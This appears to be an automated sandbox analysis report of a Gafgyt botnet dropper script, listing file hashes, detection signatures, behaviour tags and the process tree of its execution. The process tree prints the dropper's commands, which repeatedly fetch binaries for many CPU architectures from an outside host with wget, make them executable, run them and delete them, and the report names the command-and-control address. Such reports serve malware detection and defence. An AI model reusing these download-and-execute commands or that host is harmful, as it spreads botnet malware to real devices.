Analysis
-
max time kernel
16s -
max time network
18s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-12-2024 15:05
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
sex.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
255decb3180bb0e03b43d0d6246c3977
-
SHA1
c99637830a502bc731837adff300980a592e8316
-
SHA256
2d718fdd5a61973c8c4c9bd4e7f40e5e424dd39d446597efc4cb79889211f875
-
SHA512
0389441154ebc943637cecbd434c38567baf4eb068bc68184906ec5f1c61eee928b0a1b73f5de65fa8d02fedd686169d64519be2c4c75d45824da982247ee3fd
Malware Config
Extracted
gafgyt
84.200.24.7:666
Signatures
-
Detected Gafgyt variant 12 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_gafgyt behavioral3/files/fstream-2.dat family_gafgyt behavioral3/files/fstream-3.dat family_gafgyt behavioral3/files/fstream-4.dat family_gafgyt behavioral3/files/fstream-5.dat family_gafgyt behavioral3/files/fstream-6.dat family_gafgyt behavioral3/files/fstream-7.dat family_gafgyt behavioral3/files/fstream-8.dat family_gafgyt behavioral3/files/fstream-9.dat family_gafgyt behavioral3/files/fstream-10.dat family_gafgyt behavioral3/files/fstream-11.dat family_gafgyt behavioral3/files/fstream-12.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 753 chmod 766 chmod 771 chmod 776 chmod 783 chmod 824 chmod 841 chmod 851 chmod 856 chmod 736 chmod 760 chmod 796 chmod 809 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/mips 738 mips /tmp/mipsel 754 mipsel /tmp/sh4 761 sh4 /tmp/x86 767 x86 /tmp/arm61 772 arm61 /tmp/i686 777 i686 /tmp/ppc 784 ppc /tmp/586 797 586 /tmp/m68k 811 m68k /tmp/dc 825 dc /tmp/dss 843 dss /tmp/co 852 co -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog mips File opened for modification /dev/misc/watchdog mips -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 738 mips -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 738 mips 741 rm 744 wget 754 mipsel 756 rm 721 wget -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/co wget File opened for modification /tmp/mipsel wget File opened for modification /tmp/arm61 wget File opened for modification /tmp/m68k wget File opened for modification /tmp/i686 wget File opened for modification /tmp/ppc wget File opened for modification /tmp/586 wget File opened for modification /tmp/dc wget File opened for modification /tmp/dss wget File opened for modification /tmp/mips wget File opened for modification /tmp/sh4 wget File opened for modification /tmp/x86 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:719
-
/usr/bin/wgetwget http://84.200.24.7/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/mips./mips2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- System Network Configuration Discovery
PID:738
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/wgetwget http://84.200.24.7/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/mipsel./mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:754
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/wgetwget http://84.200.24.7/sh42⤵
- Writes file to tmp directory
PID:757
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/sh4./sh42⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm -rf sh42⤵PID:764
-
-
/usr/bin/wgetwget http://84.200.24.7/x862⤵
- Writes file to tmp directory
PID:765
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/x86./x862⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm -rf x862⤵PID:769
-
-
/usr/bin/wgetwget http://84.200.24.7/arm612⤵
- Writes file to tmp directory
PID:770
-
-
/bin/chmodchmod +x arm612⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm -rf arm612⤵PID:774
-
-
/usr/bin/wgetwget http://84.200.24.7/i6862⤵
- Writes file to tmp directory
PID:775
-
-
/bin/chmodchmod +x i6862⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/i686./i6862⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm -rf i6862⤵PID:779
-
-
/usr/bin/wgetwget http://84.200.24.7/ppc2⤵
- Writes file to tmp directory
PID:780
-
-
/bin/chmodchmod +x ppc2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/ppc./ppc2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm -rf ppc2⤵PID:787
-
-
/usr/bin/wgetwget http://84.200.24.7/5862⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod +x 5862⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/586./5862⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm -rf 5862⤵PID:800
-
-
/usr/bin/wgetwget http://84.200.24.7/m68k2⤵
- Writes file to tmp directory
PID:802
-
-
/bin/chmodchmod +x m68k2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/m68k./m68k2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm -rf m68k2⤵PID:814
-
-
/usr/bin/wgetwget http://84.200.24.7/dc2⤵
- Writes file to tmp directory
PID:815
-
-
/bin/chmodchmod +x dc2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/dc./dc2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm -rf dc2⤵PID:828
-
-
/usr/bin/wgetwget http://84.200.24.7/dss2⤵
- Writes file to tmp directory
PID:830
-
-
/bin/chmodchmod +x dss2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/dss./dss2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm -rf dss2⤵PID:846
-
-
/usr/bin/wgetwget http://84.200.24.7/co2⤵
- Writes file to tmp directory
PID:848
-
-
/bin/chmodchmod +x co2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/co./co2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm -rf co2⤵PID:854
-
-
/usr/bin/wgetwget http://84.200.24.7/scar2⤵PID:855
-
-
/bin/chmodchmod +x scar2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/scar./scar2⤵PID:857
-
-
/bin/rmrm -rf scar2⤵PID:858
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58463bb2a52278fccd845a2446f8be854
SHA17369b66a49a6066030c37e8e1a0ec19ab878e2ec
SHA25619e6eb7e3ca3f073200b950dbfa30644d9afcbf99c74c650c8a0016eb0aea420
SHA512f92579021b6316079c55db56d94dc79b6f8dccd5eac1ca4b8451644b0df8297ed0a1203828bc25cc218da0badb89968fe5a7342d724044ff4ac4de8ff60ccfe7
-
Filesize
136KB
MD58be4d39830172bb4eb47b989973d349d
SHA12e55fa4c873a9646535f856ee8f3fbf24de6279f
SHA25600ffb68e788d3e5e910d2e1d4a036a11f4b34274d9d2b281b1a9882c03907799
SHA512c38cf50e7c14b053e0cc9432920b6f3e576a7662b09dbbc1c16cbdff8a4b820122f1ebe3f5a969ba1e5c87e3c240183618b4e625a853aa13cd6c216b4e6fe016
-
Filesize
117KB
MD549f06082c95ca854779ecada9a788849
SHA19394600a9f7212ddc175659dc272ae4759c738b3
SHA256b1b260102dbf4bedc8045bf87820ca8304be082f17c34531f14c30c240ad08e1
SHA5128ac1038399d5bf68dcbdc917148416da3d36aba2da9c1a4f298897b8411908ab7032a1e95ab205e129751164839febd78c43d97d6d5849cd98b35a79846a6da3
-
Filesize
123KB
MD51d28148f828971df08bca7f5b4fd0e0f
SHA191b1b9b7aa460dfa99ffa2ce7bde67a00c3f8237
SHA256169154df3f7d61ab01e0fe96646800b2e18727adc5f0c9abddd57c1770a17afd
SHA5123e7dbee01cfb5109fe2f55628257e6cc3962384ddce673912994ac7f3ab13db1d280ec341ddfa9ca3b81b2edcf90b3241f69a28b8b9dfe1941af466f906366a9
-
Filesize
124KB
MD54aaf4d4b417d7a5078a0e48f12653d81
SHA1d2b6785e877fae5c0ad5978f9d510e8cfdf5e102
SHA256e7026cb71392d47f04c12cb8c1591561e0d63b815142102bfea482dfd9635acb
SHA512dfa7c6185820f6da4e3512ce8455becea881798460542dc2b67e2a5a59e528371942b30430c6a7b51439fee9ec6eb7676b1bc87a04484da28c553fe049c029b1
-
Filesize
96KB
MD541f1dfcf258eab8a0845e9accc3b0174
SHA1216756fb1769ffb855e39f62b2c3cab63c66eaee
SHA256b23ac5a469bbb1b8abb3c82fcd13d1dbbb27d82bb847b93a392e4efbeefcc48c
SHA5124c4e9f1609c0faf6d76eb6a60cd86941fc69fe21c3634c851f923da9354a4f5967eb4b7875f8d16e2ca6e272beac280f8a4c1b64528765a515e5501906b503a1
-
Filesize
111KB
MD5c9d48ac85b3b184fd20b5bc3fb4872d3
SHA1ec02edde62edeeade7fce1b6a5f0390e242a4723
SHA256e8c1bbf011a3127022114e5a1a07fed193af7016aba66fe6ca378405db19b7de
SHA512fe2fcea215ee984228db99de7c88b4f9476ada843528ac4cc076ff076a1354cd499b8b4429e2f54e455df8fa84568c817c982fd2f10ba7233b4ceda0d86eada7
-
Filesize
148KB
MD5d6001ccc3698da0b114c8ecbf2f31bbc
SHA198403730633fd63e92b04c5f149a07668bd62012
SHA25637cdc22e48013fc55d7e6d7e300a8fc1b8803d99b7cbd451bc16313982b51298
SHA512096cbc89b0ba1d76a5524aa6ee98223c11dd3a2f2eb2a522b43ebce57004c67b656835d0b5bf6e8fc36956dae15684bfbf11cfb95c407415abf8e618ef8dd86d
-
Filesize
148KB
MD504680d0ce29c9e9c0b315df004e4e711
SHA1acbdd21883d584685ae4cf5bade335c83a03d120
SHA256e9d7c7273b9c1a1dc9885829f79bc8d44d2054ef074ebf8757e61c8e29c1c953
SHA51205938331f8e14f842131e2ae0401ae32fb7fa1a3c8647f9a56c5b601867285d7b2cb1c84f2e361444af4fe1c74097e9bb5204fbaf91a1b0fa38d55823baf7bdd
-
Filesize
110KB
MD58a9b060beade95395607241a1ba2748f
SHA14cfb9674e8ef3653d1b1f4be28d7d71076c2df18
SHA2565468d7962128a23f13a0074cdc95b2e7d6e2a5bd31a19b85db2076fbf61a62b2
SHA512879120d420e039b45bbae9cefd543ba92200a5c8f153464daea6efcbcccf46a95eac725c8b5ccfbc48b8581038858eb9dfc2eb62ad5575d3e6c4cb634990d73c
-
Filesize
105KB
MD511f24d2812bd00bdb9119c5b5e77d70b
SHA10a983e68c941009b19c386d90d35d9642abfe713
SHA256dadf9d1330b764611ba37e94bbca21b493084ef2dddbc7ee8acb0203d4719b88
SHA512170f0ca6296b17ddb41705ae092b7b02c7da08c0525e45446b6ced1ac3557065ab0dd108c7064e4e13e30f30a523a74eeddafae7a3d94c0c0fc82fb70bc7e249
-
Filesize
112KB
MD5b2a245611aaae902c4f5be372dc37327
SHA17accc90c3514bb07ff4c327b2b715b4f99a08cf9
SHA256392d95c696d2fb3e5ee826c177215a91e5d31a59348fd582803fecff1ec315ad
SHA512b8d65369c6bfae0534457c9b126f8496cc060da71c6d3cfb5877acf3512525a204720a4d169bcbab69d5c3c3e5558f271bcba619eef94603d08673a3ce1af4fe